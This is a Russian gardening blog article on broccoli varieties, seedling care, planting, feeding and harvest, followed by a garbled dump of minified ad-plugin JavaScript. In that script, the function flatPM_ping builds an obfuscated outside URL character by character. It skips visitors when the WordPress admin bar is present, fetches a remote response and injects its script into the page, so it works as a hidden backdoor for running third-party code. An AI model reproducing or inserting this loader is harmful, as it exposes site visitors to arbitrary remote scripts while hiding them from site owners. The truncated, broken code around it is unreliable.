    Интересная разновидность капусты, у которой в качестве пищи, используются не листья, а нераспустившиеся соцветия, смотрите на фото. Брокколи не требует особого ухода при выращивании, устойчива к засушливой почве и температурным перепадам. Ее можно вырастить на приусадебном участке в открытом грунте.

    Данная разновидность является растением однолетним, любящим солнечные, прогретые места. Отличается раскидистой розеткой с крупными листьями, в высоту растет до 90 см (в зависимости от условий произрастания). Соцветиями немного напоминает цветную капусту, но головки отличаются рыхлостью. У цветной они более упругие.

    Многие гибриды образуют боковые побеги, на которых тоже развиваются головки с соцветиями, но меньших размеров, по сравнению с центральной. Срезание центрального соцветия ускоряет развитие боковых побегов.

    Этот овощ ценится как диетический продукт, ведь его калорийность всего 28 ккал/100г продукта. Богат витаминным и минеральным составом, биологически активными веществами, которые используются для оздоровления организма и с целью профилактики заболеваний.

    Перед посевом, необходимо определиться с сортом капусты. Какой гибрид подойдет для ваших климатических условий.

    Сорта и гибриды капусты брокколи с фото

    По своим биологическим характеристикам и полезности, эта разновидность перекрывает свойства капусты цветной:

    1. Она более холодоустойчива,
    2. Имеет сильный иммунитет к болезням и вредителям,
    3. Обладает хорошей урожайностью,
    4. Ей свойственна ремонтантность (способность к повторному цветению и плодоношению),
    5. Относится к нетребовательным культурам,
    6. Помимо головок с соцветиями в пищу идут побеги, вырастающие до 10-15 см.

    Наиболее популярные разновидности капусты: калабрезе, имеющая плотное соцветие на толстеньком стебле и капуста итальянская (спаржевая) у которой головки соцветий небольших размеров, формируются на многочисленных стеблях.

    Из этих двух разновидностей селекционерами выведено около 200 пищевых сортов, которые по своему периоду вегетации подразделяются на сорта и гибриды ранние, поздние и среднеспелые. Хочу привести лишь некоторые из них:

    Сорта с коротким вегетационным периодом — ранние

    «Фиеста» — сорт быстрого созревания, к употреблению в пищу готов уже через 70 суток. Отличается более крупным соцветием, сочным и плотным, головка весит до 300 г. Ремонтантность этому сорту не присуща, он не дает боковых стеблей.

    Капуста брокколи Фиеста F1

    Соцветия могут храниться в холодильнике дней 14. Длительный срок хранения и употребление в пищу, может нанести вред организму.

    «Грин Мэджик» — гибрид первого поколения. Первый урожай можно снимать через 65-70 дней. На приподнятой листовой розетке листьев, формируется соцветие весом до 700 г. Соцветие изумрудного цвета с сизым оттенком, круглое, плотное. Обладает высокой устойчивостью к цветушности, дает дополнительные побеги с соцветиями.

    Брокколи Грин Мэджик

    К ранним гибридам относятся: «Трибуте», «Вярус», «Грин Спроутинг», «Корвет»

    Сорта и гибриды среднеспелые

    Сорт «Линда» созревает 80-85 дней и относится к среднеспелым. Соцветие крупное, до 400 г, но мягкое и рыхлое. Подходит для употребления в сыром виде.

    Сорт «Тонус» созревания достигает за 80-90 дней. Головки с соцветиями плотные, массой до 200 г. Устойчивый к болезням и температурным перепадам. После срезки дает новые побеги, на которых формируются головки с массой до 70 г. Овощ используется для еды в сыром виде (салаты) и для консервирования. Длительного хранение не выносит.

    «Батавия» — гибрид первого поколения, среднеранней спелости. Размеры цветочных головок образуют большой кочан от 800 г до 2 кг. В южных районах его выращивают в качестве раннего овоща.

    Листья зелено-голубоватого цвета, отличаются волнистостью и пузырчатостью, розетка листьев приподнятая. Овощ вкусный, имеет хорошую лежкость, поэтому переносит длительную транспортировку. Боковые побеги образуют головки с массой до 200 г.

    Калабрезе, сорт среднеранний. Характеризуется холодостойкостью, плотной головкой соцветий с массой до 400 г и хорошим урожаем с боковых побегов. Устойчив к температурным перепадам.

    «Мачо» — среднеспелый гибрид первого поколения, с крупными зелеными листьями. Нежным голубоватый оттенок листьям, придает тонкий слой воскового налета. Кочанчики вырастают через 30-40 дней, после высадки рассады в грунт, массой до 200 г. Имеют насыщенный темно- зеленый цвет. После срезки быстро набирает головки на боковых побегах.

    К среднеспелым гибридам относятся: «Гном», «Грин Фаворит», «Сенши»

    Сорта и гибриды с поздними сроками созревания

    У позднеспелых гибридов сроки зрелости технической затягиваются до 130-145 дней. К ним относятся: гибрид «Аркадия», со сроком созревания урожая до 110 дней. Головка состоит из множества соцветий, общий вес которых доходит до 450 г. На боковых стеблях развивается большое количество меньших по размеру соцветий (по 70г).

    «Маратон F1», «Континенталь», «Романеско», «Монтеррей»,»Белстар», «Серфинг F1» — тоже гибриды с поздней спелостью, которые используются для зимних заготовок.

    Капуста брокколи Белстар

    Для средней полосы России и Подмосковья лучшими сортами для выращивания в открытом грунте считаются: «Тонус» и «Колобок», «Корвет» и «Вярус», «Команчи» и «Баро», «Маратон» и «Император», «Лаки» и «Вярус».

    Для регионов Сибири и Урала подходят сорта с большей устойчивостью к перепадам температурным. Поздние гибриды на данных территориях не успевают дать урожай, поэтому популярны сорта раннеспелые: «Тонус» и «Лазарь», «Вярус»и «Линда», «Мачо F1» и «Фиеста», «Грин Мэджик».

    Выращивание капусты брокколи на рассаду

    После подбора необходимых сортов и гибридов, решается вопрос о способе выращивания, с учетом условий климатических. Брокколи, как и к другим разновидностям применяют безрассадный и рассадный способ посева семян.

    Не забывайте, что рассаду капусты в открытый грунт высаживают в возрасте 35-40 дней. В нашем регионе лето короткое, поэтому для посадки, мы выбираем ранние и среднеспелые гибриды.

    Как получить крепкую рассаду из семян

    Прежде чем положить семена в землю, следует провести с ними нехитрые манипуляции, которые помогут активизировать их к жизни и росту.

    1. Сначала выбираем хороший посадочный материал, то есть проводим калибровку. Мелкие семена и неправильной формы (изогнутые, с вмятинами) удаляем.
    2. Помещаем семена в горячую воду (градусов 50), минут на 15. И сразу после этого, в воду прохладную (на несколько минут). Перепады температурные являются стрессом и заставляют семена «проснуться».
    3. После можно подержать их в растворе гетероауксина для стимуляции роста и развития (до 5-6 часов), промыть водой проточной и подсушить.

    Посмотрите видео о лучших сортах капусты брокколи и методах выращивания:

    Готовим землю для рассады

    Если почвосмесь готовите в домашних условиях, то заранее нужно смешать дерновую землю с песком и перегноем в пропорциях (2:1:1). На 25 л земли примешать стакан золы и удобрения.

    Опытные огородники рекомендуют прокаливать землю, чтобы исключить заражение молодых растений болезнями или пролить ее марганцовкой. Земля должна быть рыхлой и легкой.

    Закладка семян в землю

    Высевать семена можно в любые емкости с высотой бортиков 5-7 см, дно которой необходимо покрыть слоем дренажа, из гальки или керамзита.

    Семена закладываются в хорошо увлажненную землю, на глубину 1 см. Между семенами выдерживать расстояние 3-4 см. Хорошо использовать для выращивания рассады кассеты или маленькие пластиковые стаканчики из под сметаны или йогурта.

    Какие условия необходимы для рассады

    Поддерживаем температурный режим. Пока семена не проклюнулись, окружающая температура поддерживается на уровне 19-20 градусов. После появления всходов, ее необходимо снизить до 10 градусов, дней на 7-8.

    В последующие дни дневные температуры поддерживать на уровне 15-17 градусов в плюсе, а ночные в пределах 10 градусов. Почва должна быть влажной, но не переувлажненной.

    Уход за сеянцами

    Как только молодым росткам минет 14 дней, их следует пикировать по отдельным стаканчикам, если семена сеяли в ящичке. Для пикировки хорошо подходят торфяные горшочки, ведь рассаду вместе с ними высаживают в грунт. И пересадка проходит безболезненно.

    В уход после пикировки входит полив растений, поддержка температурного режима, подкормка и закаливание рассады перед высадкой в грунт.

    Выращивание капусты брокколи в открытом грунте

    Брокколи любит светлые, теплые места, поэтому выбирайте для нее место солнечное. Готовьте рыхлую и плодородную почву нейтрального или щелочного состава. Предшественниками при посадке могут быть бобовые культуры, картофель и морковь. А грядки, где росли крестоцветные растения (репка, редис, капуста, редька), лучше избегать. Это снижает урожайность.

    Опытные огородники готовят почву под капусту с осени, обогащая ее перегноем, минералами или удобрениями. Полезны для капусты фосфор и калий, известь — пушонка. Но недостаток питательных веществ в почве, всегда можно компенсировать своевременными подкормками.

    Когда сажать рассаду. При высадке рассады в грунт открытый, на растениях должно быть по 4-5 настоящих листочков (без учета семядольных) и развитая корневая система. В нашем регионе капусту в грунт высаживают в начале июня. Надо ориентироваться на погоду своего края и ждать, когда ночные температуры не понижаются ниже 0 градусов.

    Пересадка рассады в грунт

    Основные критерии, которые должны учитываться при пересадке рассады в грунт:

    • возраст рассады 35-40 дней,
    • растения здоровые и хорошо развитые с 5-4 настоящими листочками и крепкой корневой системой,
    • место солнечное, земля удобренная.

    Подготовьте предварительно лунки для капусты, между которыми выдерживайте расстояние 40 х 60.

    Если землю с осени не удобряли, следует ведро перегноя перемешать с 2-мя стаканами золы, 2-мя ложками столовыми суперфосфата и ложкой мочевины. Эту смесь разделить на 4 лунки, хорошо перемешивая с землей.

    После увлажнения земли, в каждую лунку высадить по одному кустику капусты. Еще раз пролить и прикрыть укрывным материалом, пока рассада не адаптируется к новым условиям.

    Как ухаживать за брокколи

    Уход за капустой включает в себя полив растений, рыхление почвы, прополку и окучивание, подкормку и защиту от вредителей.

    Рыхление проводится не глубокое, чтобы не повредить корневую систему. Желательно делать его после полива, чтобы закрыть землю от испарения.

    Капусту в первые дни поливают ежедневно, а после достаточно одного раза в неделю. Но опять же, ориентируются на местные условия. Если стоит ежедневная жара и на небе ни облачка, то придется поливать чаще. Капуста любит полив и под корень и сверху по листьям.

    Подкормка растений

    Подкормку растений можно запланировать уже через дней 14 после высадки рассады в грунт. Благотворно воспринимается растениями подкормка из свежего коровяка, настоянного на воде (250 г на ведро воды). В настой добавить ложку столовую удобрения азотного и полить растения из расчета на метр квадратный — литр настоя. Применяют и помет куриный.

    Вторую подкормку проводят спустя дней 20 после первой, в которой упор делают на удобрения азотные. На полуторное ведро воды добавляют селитры аммиачной (спичечный коробок). На метр квадратный почвы, выливают по литру удобрения.

    Третья подкормка важна для капусты в конце лета, упор делают на фосфорные и калийные элементы (на 15 л воды примешивают граммов 10-11 калия сульфата и 35 г суперфосфата). Теперь на метр квадратный земли, расходуется 1500 мл раствора.

    После срезки центральной головки соцветия, растения подкармливают еще раз, для ускорения завязей на боковых побегах. В ведре воды растворяют нитроаммофоску и выливают под каждый кустик литр раствора. А спустя неделю, на влажную землю распыляют золу — калийное удобрение (по 150 200 г под каждый корень.

    Когда собирать первый урожай

    Вначале статьи уже упоминалось, что у этой разновидности капусты, для еды собирают нераскрывшиеся соцветия. Поэтому следует быть внимательными, чтобы не упустить время.

    Ориентироваться можно на размер соцветия, указанный на упаковке семян. Если написано, что головка к сбору урожая должна быть около 10 см в диаметре, то стараться вырастить ее больше не стоит.

    С момента высадки растений в грунт и до первого сбора должно пройти дней 60-65. Нераскрывшиеся бутоны капусты брокколи обычно темно-зеленого цвета, если бутончики начали желтеть — это признак того, что они скоро раскроются. Надо срочно срезать головку капусты.

    Раскрытые соцветия теряют свой вкус и питательную ценность. Срезку капусты рекомендуют проводить утром, когда растение находится в тургоре.

    Глядя на фото, представленные в статье и описание гибридов, вы можете подобрать для себя капусту брокколи и, обеспечивая хороший уход, вырастить любимый сорт в открытом грунте.

    Богатого вам урожая, уважаемые огородники!

    В статьях блога используются картинки, из открытых источников Интернета. Если вы, вдруг, увидите свое авторское фото, сообщите об этом редактору блога через форму Обратная связь. Фотография будет удалена, либо будет поставлена ссылка на ваш ресурс. Спасибо за понимание!

    Ссылка на основную публикацию
    Adblock
    detector
    ":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
    '+c+"
    "),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
    Закрыть через '+o.how.outgoing.timer_count+"
    ":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
    '+c+"
    ");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
    '),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
    "],tbody:[1,"","
    "],colgroup:[2,"","
    "],col:[3,"","
    "],tr:[2,"","
    "],td:[3,"","
    "],th:[3,"","
    "],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
    '+a+" через "+o+'
    '+n+'
    ',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
    ');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};